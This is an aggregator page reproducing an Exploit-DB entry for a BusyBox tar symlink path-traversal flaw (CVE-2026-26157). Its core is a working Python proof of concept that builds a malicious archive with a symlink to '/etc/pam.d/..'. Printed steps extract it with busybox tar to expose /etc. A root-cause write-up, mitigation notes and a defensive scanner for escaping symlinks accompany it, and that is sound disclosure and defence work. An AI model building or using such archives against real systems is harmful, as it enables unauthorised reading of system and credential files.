Security News

Cybersecurity news aggregator

MEDIUM Vulnerabilities Exploit-DB

[webapps] BusyBox 1.37.0 - Path Traversal

  • What: A path traversal vulnerability in BusyBox 1.37.0
  • Impact: Could allow attackers to access arbitrary files on the system

Exploit-DB entry: BusyBox 1.37.0 - Path Traversal

  • EDB-ID: 52538
  • CVE: CVE-2026-26157
  • Author: Calil Khalil
  • Type: webapps
  • Platform: Multiple
  • Date: 2026-04-30

Exploit listing as published on Exploit-DB:

```python
# Exploit Title: BusyBox 1.37.0 - Path Traversal
# Google Dork: N/A
# Date: 2026-02-11
# Exploit Author: Calil Khalil
# Vendor Homepage: https://busybox.net
# Software Link: https://busybox.net/downloads/
# Version: BusyBox 1.36.1, 1.37.0
# Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
# CVE: CVE-2026-26157

"""
BusyBox Path Traversal Vulnerability (CVE-2026-26157)

Description:
BusyBox archive extraction utilities fail to properly sanitize symlink
targets containing trailing ".." components. The strip_unsafe_prefix()
function in archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../")
which only matches the 4-character pattern and misses 3-character trailing
"/.." sequences. This allows an attacker to craft malicious archives with
symlinks pointing to arbitrary filesystem locations, enabling information
disclosure through symlink traversal.

Affected Components:
- tar (primary vector)
- unzip
- rpm
- ar

Impact:
- CVSS Score: 7.8 (HIGH)
- Arbitrary file read via symlink traversal
- Information disclosure
- Credential theft

Root Cause: archival/libarchive/unsafe_prefix.c:23
The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:

    cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
    if (!cp2)
        break;

Attack Scenario:
1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
2. Victim extracts archive using BusyBox tar
3. Symlink created without sanitization
4. Symlink resolves to /etc directory
5. Application reading 'sensitive_data' exposes /etc contents

References:
- https://github.com/calilkhalil/research
- Red Hat CNA Case: INC3907198
"""

import sys
import tarfile


def create_exploit():
    """
    Creates a malicious TAR file exploiting CVE-2026-26157.

    The archive contains a symlink with an unsanitized target that
    resolves outside the extraction directory.
    """
    exploit_file = 'CVE-2026-26157_exploit.tar'

    try:
        with tarfile.open(exploit_file, 'w') as tar:
            # Create symlink with trailing ".." in target path.
            # This bypasses strip_unsafe_prefix() pattern matching.
            info = tarfile.TarInfo('sensitive_data')
            info.type = tarfile.SYMTYPE
            info.linkname = '/etc/pam.d/..'  # Resolves to /etc
            tar.addfile(info)

        print(f"[+] Exploit created: {exploit_file}")
        print("\n[*] Exploitation steps:")
        print("    1. mkdir test_extraction && cd test_extraction")
        print(f"    2. busybox tar xf ../{exploit_file}")
        print("    3. readlink -f sensitive_data")
        print("       Expected output: /etc")
        print("    4. ls sensitive_data/")
        print("       Result: Lists /etc directory contents")
        print("\n[!] Impact: Arbitrary directory read via symlink traversal")
        print("[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")

        return exploit_file

    except Exception as e:
        print(f"[-] Error creating exploit: {e}")
        sys.exit(1)


def show_technical_details():
    """Display technical analysis of the vulnerability"""
    print("\n" + "=" * 70)
    print("TECHNICAL ANALYSIS - CVE-2026-26157")
    print("=" * 70)

    print("\nVulnerable Function:")
    print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")

    print("\nVulnerable Code Pattern:")
    print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
    print("  if (!cp2) break;")

    print("\nBypass Technique:")
    print("  Path: /etc/pam.d/..")
    print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
    print("  Result: Sanitization bypassed, symlink created with original target")

    print("\nExploitation Flow:")
    print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
    print("  2. get_header_tar() extracts symlink metadata")
    print("  3. Symlink target NOT sanitized (bypass detected)")
    print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
    print("  5. Target resolves: /etc/pam.d/.. -> /etc")
    print("  6. Reading 'sensitive_data' = reading /etc")
    print("=" * 70 + "\n")


if __name__ == "__main__":
    print("=" * 70)
    print("BusyBox Path Traversal Exploit - CVE-2026-26157")
    print("Author: Calil Khalil")
    print("=" * 70)

    # Display technical analysis
    show_technical_details()

    # Create exploit
    exploit_file = create_exploit()

    print("\n[*] Mitigation:")
    print("    - Update BusyBox to patched version")
    print("    - Patch applies strip_unsafe_prefix() to symlink targets")
    print("    - Do not extract untrusted archives with elevated privileges")
    print("\n[*] For educational and authorized testing purposes only")
```
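A pre-extraction scanner for the trailing "/.." case the advisory describes, written here as an added defender-side example; it is not part of the Exploit-DB entry or of BusyBox. `naive_has_dotdot` models the substring check the advisory attributes to strip_unsafe_prefix() (an assumption based on that description, not BusyBox's code), and the archive contents and function names are constructed for illustration.

```python
import io
import posixpath
import tarfile

# Models the check described in the advisory: only the 4-char "/../" is
# noticed, so a target that merely ends in "/.." is never flagged.
def naive_has_dotdot(target: str) -> bool:
    return "/../" in target

# Component-wise check: any ".." component counts, trailing ones included.
def has_dotdot_component(target: str) -> bool:
    return ".." in target.split("/")

def symlink_escapes(member_name: str, linkname: str) -> bool:
    """True when a symlink target can resolve outside the extraction root.
    Absolute targets always escape; relative ones are resolved against the
    member's own directory and normalised. Symlinks already created by
    earlier archive members are not chased (a conservative pre-check)."""
    if linkname.startswith("/"):
        return True
    base = posixpath.dirname(member_name)
    resolved = posixpath.normpath(posixpath.join(base, linkname))
    return resolved == ".." or resolved.startswith("../")

def unsafe_symlinks(archive: bytes) -> list[tuple[str, str]]:
    """Return (name, target) for every symlink member that escapes."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar:
            if m.issym() and symlink_escapes(m.name, m.linkname):
                bad.append((m.name, m.linkname))
    return bad

def build_sample_archive() -> bytes:
    """Constructed sample archive: one benign symlink, three that escape."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, target in [
            ("docs/readme", "../docs/README.md"),  # normalises to docs/README.md
            ("sensitive_data", "/etc/pam.d/.."),   # trailing "/.." case
            ("up", "../../etc"),                   # classic relative escape
            ("a/b/c", "../../../x"),               # escape from a nested member
        ]:
            info = tarfile.TarInfo(name)
            info.type = tarfile.SYMTYPE
            info.linkname = target
            tar.addfile(info)
    return buf.getvalue()
```

Running `unsafe_symlinks(build_sample_archive())` lists the three escaping members while the substring check alone passes "/etc/pam.d/..", which is the gap the advisory points at.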
